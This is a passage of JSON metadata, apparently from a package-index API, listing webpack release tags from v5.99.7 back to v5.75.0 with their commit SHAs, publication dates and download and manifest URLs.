bpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpac